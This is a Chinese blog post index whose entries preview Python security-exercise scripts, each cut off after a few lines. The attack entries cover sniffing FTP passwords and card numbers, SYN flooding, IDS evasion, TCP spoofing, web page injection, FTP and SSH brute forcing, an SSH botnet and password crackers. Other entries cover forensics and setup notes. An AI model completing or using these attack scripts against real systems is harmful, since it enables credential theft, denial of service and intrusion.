自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(44)
  • 收藏
  • 关注

转载 Scapy嗅探FTP用户密码

#!/usr/bin/python#coding=utf-8import optparsefrom scapy.all import *def ftpSniff(pkt): dest = pkt.getlayer(IP).dst raw = pkt.sprintf('%Raw.load%') user = re.findall('(?i)USER (.*)', r

2018-01-23 23:46:11 1547

转载 Scapy嗅探TCP数据包

#!/usr/bin/python#coding=utf-8import reimport optparsefrom scapy.all import *def findCreditCard(pkt): raw = pkt.sprintf('%Raw.load%') # American Express信用卡由34或37开头的15位数字组成 americaRE = re.find

2018-01-23 18:06:35 2510

原创 取证应用程序

Pfish.py# -*- coding:UTF-8 -*-## p-fish : Python File System Hash Program# Author: C. Hosmer# July 2013# Version 1.0#import logging #Python Standard Library Loggerimport time

2018-01-21 17:36:12 544

转载 使用Scapy愚弄入侵检测系统

#!/usr/bin/python#coding=utf-8import optparsefrom scapy.all import *from random import randint# 触发DDoS警报def ddosTest(src, dst, iface, count): pkt = IP(src=src, dst=dst) / ICMP(type=8, id=67

2018-01-18 15:20:03 637

转载 伪造TCP连接

#!/usr/bin/python#coding=utf-8import optparsefrom scapy.all import *def synFlood(src, tgt): # TCP源端口不断自增一,而目标端口513不变 for sport in range(1024, 65535): IPlayer = IP(src=src, dst=tgt

2018-01-18 10:11:36 2361

转载 计算TCP序列号

#!/usr/bin/python#coding=utf-8from scapy.all import *def calTSN(tgt): seqNum = 0 preNum = 0 diffSeq = 0 # 重复4次操作 for x in range(1,5): # 若不是第一次发送SYN包,则设置前一个序列号值为上一次SYN/A

2018-01-18 09:27:09 1099

转载 使用Scapy制造SYN洪泛攻击

#!/usr/bin/python#coding=utf-8from scapy.all import *import optparsedef synFlood(src, tgt): # TCP源端口不断自增一,而目标端口513不变 for sport in range(1024, 65535): IPlayer = IP(src=src, dst=tgt

2018-01-17 16:49:41 1606

转载 用Scapy找出fast-flux流量

#!/usr/bin/python#coding=utf-8from scapy.all import *dnsRecords = {}'''解析pcap文件中所有含DNSRR的数据包,提取分别含有查询的域名和对应的IP的rrname和rdata变量,然后建立一个索引字典并对字典中未出现的IP添加到数组中。'''def handlePkt(pkt): # 判断是否含有DNS

2018-01-17 15:45:05 507

原创 用Scapy解析TTL字段的值

#!/usr/bin/python#coding=utf-8from scapy.all import *import timeimport optparse# 为避免IPy库中的IP类与Scapy库中的IP类冲突,重命名为IPTEST类from IPy import IP as IPTESTttlValues = {}THRESH = 5# 检查数据包的IP层,提取出源IP

2018-01-17 11:14:29 1653 1

转载 Mac平台安装scapy

注:python2.7.10一、首先scapy依赖了以下几个库:1.PyX  :   2.pcapy3.gnuplot-py4.dnet其中gnuplot-py 以及pyx一定要使用官方网站上面的指定版本。使用备份库github: https://github.com/todototry/scapyInstallD

2018-01-17 08:55:12 2321 1

转载 分析LOIC流,判断DDoS攻击源

#!/usr/bin/python#coding=utf-8import dpktimport socketimport optparse# 默认设置检测不正常数据包的数量的阈值为1000THRESH = 1000def findDownload(pcap): for (ts, buf) in pcap: try: eth = dp

2018-01-16 11:51:47 2275

转载 解析TCP数据包,针对符合端口条件的数据关键字过滤

#!/usr/bin/python#coding=utf-8import dpktimport socketdef findHivemind(pcap): for (ts, buf) in pcap: try: eth = dpkt.ethernet.Ethernet(buf) ip = eth.data

2018-01-16 10:39:27 586

转载 解析HTTP协议,GET方法中寻找关键字。

#!/usr/bin/python#coding=utf-8import dpktimport socketdef findDownload(pcap): for (ts, buf) in pcap: try: eth = dpkt.ethernet.Ethernet(buf) ip = eth.data

2018-01-16 10:37:47 938

转载 使用Python画谷歌地图

#!/usr/bin/python#coding=utf-8import dpktimport socketimport pygeoipimport optparsegi = pygeoip.GeoIP('GeoLiteCity.dat')# 通过IP地址的经纬度构建kml结构def retKML(ip): rec = gi.record_by_name(ip)

2018-01-15 19:00:16 4581 1

转载 IP地址对应的物理位置简单地解析出城市

#!/usr/bin/python# -*- coding: utf-8 -*import dpktimport socketimport pygeoipimport optparsegi = pygeoip.GeoIP('GeoLiteCity.dat')# 查询数据库相关的城市信息并输出def printRecord(tgt): rec = gi.record_by

2018-01-15 17:04:12 3158

转载 使用Dpkt解析包

#!/usr/bin/python#coding=utf-8import dpktimport socketimport optparsedef printPcap(pcap): # 遍历[timestamp, packet]记录的数组 for (ts, buf) in pcap: try: # 获取以太网部分数据

2018-01-15 15:10:48 5313

转载 使用PyGeoIP关联IP地址和物理地址

#!/usr/bin/python# -*- coding: utf-8 -*-import pygeoipimport optparsegi = pygeoip.GeoIP('GeoLiteCity.dat')# 查询数据库相关的城市信息并输出def printRecord(tgt): global gi rec = gi.record_by_name(tgt

2018-01-15 11:44:15 1342

转载 用Python解析火狐浏览器的SQLite3数据库

#!/usr/bin/python#coding = utf-8import reimport optparseimport osimport sqlite3def printDownloads(downloadDB): conn = sqlite3.connect(downloadDB) c = conn.cursor() c.execute('SELECT

2018-01-14 17:47:11 791

转载 操作DB数据库

#!/usr/bin/python#coding=utf-8import sqlite3import optparseimport os# 连接main.db数据库,申请游标,执行SQL语句并返回结果def printProfile(skypeDB): conn = sqlite3.connect(skypeDB) #定义一个游标,游标对象可以执行下列操作 '

2018-01-14 11:36:16 341

转载 查看图像文件的元数据

#!/usr/bin/python#coding=utf-8import optparsefrom PIL import Imagefrom PIL.ExifTags import TAGSimport urllib2from bs4 import BeautifulSoup as BSfrom os.path import basenamefrom urlpars

2018-01-14 11:34:14 4767

转载 构建自己的Conficker

#!/usr/bin/python#coding=utf-8import nmapimport osimport optparseimport sysdef findTgts(subNet):    nmScan = nmap.PortScanner()    #subNet 目标IP    nmScan.scan(subNet,'445')

2018-01-11 12:24:29 184

转载 整合攻击代码

#!/usr/bin/python#coding=utf-8import ftplibimport optparseimport time#实现攻击def attack(username, password, tgtHost, redirect): ftp = ftplib.FTP(tgtHost) ftp.login(username, password) defPages

2018-01-09 15:16:06 2768 1

转载 在网页中加入恶意注入代码

#!/usr/bin/python#coding=utf-8import ftplibdef injectPage(ftp,page,redirect): f = open(page + '.tmp','w') ''' #ftplib.FTP.retrlines(command[, callback]) #使用文本传输模式返回在服务器上执行命令的结果。 #command是指定

2018-01-09 10:04:54 2854

转载 在FTP服务器上搜索指定文件

#!/usr/bin/python#coding=utf-8import ftplib'''函数检查每个文件返回默认WEB 页面文件名并将任何发现的默认 WEB 页面文件名添加到名为 retList 的列 表中。完成迭代这些文件之后,函数将返回这个列表。'''def returnDefault(ftp): try: #nlst()方法获取目录下的文件 dirList=f

2018-01-08 17:40:34 4022

转载 使用Ftplib暴力破解FTP用户口令

#!/usr/bin/python#coding=utf-8import ftplibdef bruteLogin(hostname, passwdFile): pF=open(passwdFile,'r') for line in pF.readlines(): username=line.split(':')[0] password=line.split(':')[1].s

2018-01-08 10:17:11 1541

转载 用Python构建匿名FTP扫描器

#!/usr/bin/python#coding=utf-8#Python中默认安装的ftplib模块定义了FTP类,其中函数有限,可用来实现简单的ftp客户端,用于上传或下载文件import ftplibdef anonLogin(hostname): try: #设置变量 ftp = ftplib.FTP(hostname)

2018-01-07 16:49:26 601

转载 kali linux 开机无法进入图形化界面 解决办法 亲测

今天开机居然不是以往的图形化界面可能 是丢失 或者别的什么愿意吧  输入startx  没有反应   然后Google下  可能是图形化界面程序出错了 大概是这个原因  重新安装 图形化界面   成功进入  代码如下1.$ apt-get update2.$ apt-get install x-window-system-core3.$ apt-get instal

2018-01-07 16:17:55 46323 8

转载 用vsftpd建立匿名ftp服务器

实现ftp匿名登录,上传,下载,重命名文件。首先安装vsftpd:sudo apt-get install vsftpd装好之后,默认的ftp根目录是在 /srv/ftp为该目录设置分组及权限:      sudo  chown  root:ftp  /srv/ftp     sudo chmod 755 /srv/ftp    (注意:vs

2018-01-07 15:17:36 1802

转载 OSX 10.13 以后实现终端FTP命令

10.13 以后就没了........这样操作亲测可以恢复 1,brew install telnet 2,brew install inetutils 3,brew link --overwrite inetutils

2018-01-07 14:33:54 10065

转载 构建SSH僵尸网络

#!/usr/bin/python #coding=utf-8 import optparse from pexpect import pxssh import optparse #建立一个名为botnet 的全局数组,其中记录了单个client 对象 botNet=[] #定义一个用于存放host的列表以便判断当前host之前是否已经添加进botNet中了 h

2018-01-07 12:52:18 1082 1

转载 用kali生成密钥

1.首先要确保SSH服务已经启动root@kali:~# vi /etc/ssh/sshd_config root@kali:/#/etc/init.d/ssh start验证SSH服务状态root@kali:/#/etc/init.d/sshstatus2.生成密钥KEYroot@kali:~#ssh-keygen -t

2018-01-06 14:19:47 2748

转载 通过 Pxssh 暴力破解 SSH 密码

#!/usr/bin/python #coding=utf-8 from pexpect import pxssh import optparse import time from threading import * #最大连接数被设置为5,在每个thread启动时注册一个信号量,在connect函数结束时注销这个信号量,这样同时存在的线程数量就被控制为5个。maxC

2018-01-05 18:50:53 646

转载 用Pxssh实现与SSH的简单交互

#!/usr/bin/python #coding=utf-8from optparse import OptionParser from pexpect import pxssh def send_command(child,cmd): child.sendline(cmd) #匹配prompt(提示符) child.prompt(

2018-01-05 11:09:46 2139

转载 用Pexpect与SSH交互(实现了参数化输入以及命令行shell交互的形式)

#!/usr/bin/python #coding=utf-8 import pexpect from optparse import OptionParser #SSH连接成功时的命令行交互窗口中的提示符的集合 PROMPT = ['# ','>>> ','> ','\$ '] def send_command(child,cmd): #发送一条命

2018-01-05 10:01:06 1044

转载 Pexpect 模块使用说明

背景介绍Expect 程序主要用于人机对话的模拟,就是那种系统提问,人来回答 yes/no ,或者账号登录输入用户名和密码等等的情况。因为这种情况特别多而且繁琐,所以很多语言都有各种自己的实现。最初的第一个 Expect 是由 TCL 语言实现的,所以后来的 Expect 都大致参考了最初的用法和流程,整体来说大致的流程包括:运行程序程序要求人的判断和输入Expect 通过关键字匹配

2018-01-04 16:19:39 1630

转载 用Pexpect与SSH交互

#!/usr/bin/python#coding=utf-8import pexpect#SSH连接成功时的命令行交互窗口中前面的提示字符的集合PROMPT = ['# ','>>> ','> ','\$ ']def send_command(child,cmd): #发送一条命令 child.sendline(cmd) #期望有命令行提示字符出现 child.expect

2018-01-04 11:46:19 456

转载 Kali Linux SSH登录不成功解决方法

# vim /etc/ssh/sshd_config修改:#PasswordAuthentication yes为:PasswordAuthentication yes修改:PermitRootLogin prohibit-password

2018-01-04 10:12:21 4699 1

转载 Zip文件口令破解机

#!/usr/bin/python#coding=utf-8import zipfileimport optparsefrom threading import Threaddef extractFile(zFile,password): try: ''' extractall(self, path=None, members=None, pwd=None) 从存档中提取

2018-01-03 16:18:40 764

转载 Unix口令破解机

#!/usr/bin/python#coding=utf-8import cryptdef testPass(cryptPass): salt = cryptPass[0:2] dictFile = open('dictionary.txt','r') for word in dictFile.readlines(): word = word.strip('\n') cr

2018-01-03 15:39:27 457

转载 文件判断

#!/usr/bin/python#coding=utf-8import sysimport osif len(sys.argv) == 2: #sys.argv列表中含有所有的命令行参数,sys.argv[0]为Python脚本的名称,其余的都是命令行参数 filename = sys.argv[1] #OS模块 #os.path.isfile()检查该文件是否存在

2018-01-03 15:16:07 170

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除